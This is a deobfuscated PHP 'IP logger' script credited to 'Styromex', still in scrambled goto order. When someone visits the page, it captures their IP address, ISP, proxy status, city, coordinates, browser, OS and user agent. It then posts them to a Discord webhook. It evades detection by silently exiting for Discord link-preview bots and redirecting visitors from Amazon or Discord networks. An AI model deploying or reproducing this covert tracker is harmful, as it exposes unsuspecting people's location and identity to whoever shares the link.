/* Decoded by unphp.net */ country; goto Zsoop; kt4jk: function getBrowser() { $browser = "Unknown Browser"; $browser_array = array("/msie/i" => "Internet Explorer", "/firefox/i" => "Firefox", "/Mozilla/i" => "Mozila", "/Mozilla 5.0/i" => "Mozila", "/safari/i" => "Safari", "/chrome/i" => "Chrome", "/edge/i" => "Edge", "/opera/i" => "Opera", "/OPR/i" => "Opera", "/netscape/i" => "Netscape", "/maxthon/i" => "Maxthon", "/konqueror/i" => "Konqueror", "/Bot/i" => "BOT Browser", "/Valve Steam GameOverlay/i" => "Steam", "/mobile/i" => "Handheld Browser"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $_SERVER["HTTP_USER_AGENT"])) { $browser = $value; } } return $browser; } goto hH4JZ; an0IY: curl_setopt($ch, CURLOPT_HEADER, 0); goto uCNsQ; Y_VJB: curl_setopt($Curl, CURLOPT_SSL_VERIFYHOST, false); goto M_2Xr; FAuWV: $ch = curl_init($webhookurl); goto qE4M8; NfA8Q: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); goto xJSpt; FfkJG: $OS = getOS(); goto joQnz; fWA2F: $Curl = curl_init("http://ip-api.com/json/{$ipaddress}?fields=status,country,countryCode,region,lat,lon,regionName,city,zip,timezone,isp,org,as,proxy"); goto kG7kU; BfpKr: foreach ($arr as &$value) { if (strpos($ISP, $value) !== false) { header("Location: https://nordvpn.net", true, 301); die; } } goto pBQaM; lCMQF: $City = $Info->city; goto SczBP; VNusw: foreach ($arr as &$value) { if (strpos($_SERVER["HTTP_USER_AGENT"], $value) !== false) { die; } } goto JTgvZ; ej0mX: $timestamp = date("c", strtotime("now")); goto fWA2F; xJSpt: curl_setopt($ch, CURLOPT_POST, 1); goto A96MZ; qE4M8: curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-type: application/json")); goto Y2CVQ; JTgvZ: if (!empty($_SERVER["HTTP_CLIENT_IP"])) { $ipaddress = $_SERVER["HTTP_CLIENT_IP"]; } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ipaddress = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { $ipaddress = $_SERVER["REMOTE_ADDR"]; } goto ej0mX; kG7kU: curl_setopt($Curl, CURLOPT_RETURNTRANSFER, true); goto pQjLn; A96MZ: curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); goto RpteO; tLF6c: $response = curl_exec($ch); goto fIDy4; M_2Xr: $Info = json_decode(curl_exec($Curl)); goto c09xX; jGfLU: $ISP = $Info->isp; goto srQBP; srQBP: $ProxyCheck = $Info->proxy ? "\xe2\234\x85" : "\xe2\x9d\x8c"; goto wP3cf; hH4JZ: $userAgent = $_SERVER["HTTP_USER_AGENT"]; goto Dneow; Zsoop: $Region = $Info->regionName; goto lCMQF; joQnz: $arr = array("Amazon", "Discord"); goto BfpKr; pBQaM: $json_data = json_encode(array("username" => "Logger", "embeds" => array(array("title" => " IP logger ", "description" => "Made By Styromex", "type" => "rich", "timestamp" => $timestamp, "color" => hexdec("3366ff"), "fields" => array(array("name" => "<:lipbite:953966769717006386> IP Info", "value" => "**__IP__**: {$ipaddress} **__ISP__**: {$ISP} **__Proxy__**: {$ProxyCheck}", "inline" => true), array("name" => " Location", "value" => "**__Country__**: {$Country} **__Region__**: {$Region} **__City__**: {$City}\xa**__Coordinates__**: {$COORD}", "inline" => true), array("name" => "\360\x9f\222\xbb Browser Info", "value" => "**__Browser__**: {$browser} **__OS__**: {$OS} **__User Agent__**: {$userAgent}\xa", "inline" => false), array("name" => "\xf0\x9f\224\x97 Link", "value" => "**__Link__**: `{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}`", "inline" => false))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto FAuWV; uCNsQ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto tLF6c; nNRda: function getOS() { global $user_agent; $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/kalilinux/i" => "KaliLinux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile", "/Windows Phone/i" => "Windows Phone"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $_SERVER["HTTP_USER_AGENT"])) { $os_platform = $value; } } return $os_platform; } goto kt4jk; Dneow: $arr = array("DiscordBot", "Discordbot", "+https://discordapp.com", "electron", "discord", "Firefox/92.0"); goto VNusw; Mqpg3: $browser = getBrowser(); goto FfkJG; pQjLn: curl_setopt($Curl, CURLOPT_SSL_VERIFYPEER, false); goto Y_VJB; SczBP: $COORD = "{$Info->lat}, {$Info->lon}"; goto Mqpg3; fIDy4: curl_close($ch); ?>